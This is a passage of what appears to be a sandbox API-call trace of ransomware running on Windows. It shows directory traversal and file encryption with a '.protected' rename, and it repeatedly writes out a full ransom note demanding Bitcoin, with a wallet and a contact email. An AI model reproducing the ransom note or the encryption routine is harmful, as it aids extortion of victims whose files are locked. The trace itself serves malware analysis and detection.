lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\.") returned 82 [0089.696] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.696] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\..") returned 83 [0089.696] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.696] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.697] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.697] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.697] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt") returned 98 [0089.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.699] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.699] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.700] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.700] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.700] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.700] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.700] CloseHandle (hObject=0x14c) returned 1 [0089.700] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.700] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.700] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\RESTORE_FILES.txt") returned 85 [0089.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.701] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.701] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.705] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.705] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.705] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.705] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.705] CloseHandle (hObject=0xd8) returned 1 [0089.705] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="Windows") returned -1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="Program Files") returned -1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="Program Files (x86)") returned -1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="$Recycle.bin") returned 1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="System Volume Information") returned -1 [0089.706] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2") returned 69 [0089.706] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0089.706] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned 71 [0089.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.706] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.706] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.706] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.706] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.706] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\.") returned 71 [0089.706] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.706] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.706] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.706] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.706] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.706] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.706] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\..") returned 72 [0089.706] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.706] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.706] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.706] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\RESTORE_FILES.txt") returned 87 [0089.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.707] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.707] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.708] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.708] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.708] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.708] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.708] CloseHandle (hObject=0xd8) returned 1 [0089.708] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.708] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.708] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RESTORE_FILES.txt") returned 73 [0089.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.709] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.709] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.710] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.710] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.710] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.710] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0089.710] CloseHandle (hObject=0xd4) returned 1 [0089.710] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="Windows") returned -1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="Program Files") returned -1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="Program Files (x86)") returned -1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="$Recycle.bin") returned 1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="System Volume Information") returned -1 [0089.710] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.710] StrStrIW (lpFirst="aG_M.jpg", lpSrch=".protected") returned 0x0 [0089.710] lstrcmpW (lpString1="aG_M.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0089.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ag_m.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.711] StrStrW (lpFirst="aG_M.jpg", lpSrch=".txt") returned 0x0 [0089.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.711] StrStrW (lpFirst="aG_M.jpg", lpSrch=".rar") returned 0x0 [0089.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.711] StrStrW (lpFirst="aG_M.jpg", lpSrch=".zip") returned 0x0 [0089.711] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.712] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.712] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.713] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.713] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.713] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.713] CloseHandle (hObject=0xd4) returned 1 [0089.714] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg.protected") returned 68 [0089.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ag_m.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ag_m.jpg.protected")) returned 1 [0089.715] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="Windows") returned -1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="Program Files") returned -1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="Program Files (x86)") returned -1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="$Recycle.bin") returned 1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="System Volume Information") returned -1 [0089.715] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrIW (lpFirst="BpkMqeTWM.flv", lpSrch=".protected") returned 0x0 [0089.715] lstrcmpW (lpString1="BpkMqeTWM.flv", lpString2="RESTORE_FILES.txt") returned -1 [0089.715] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.715] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 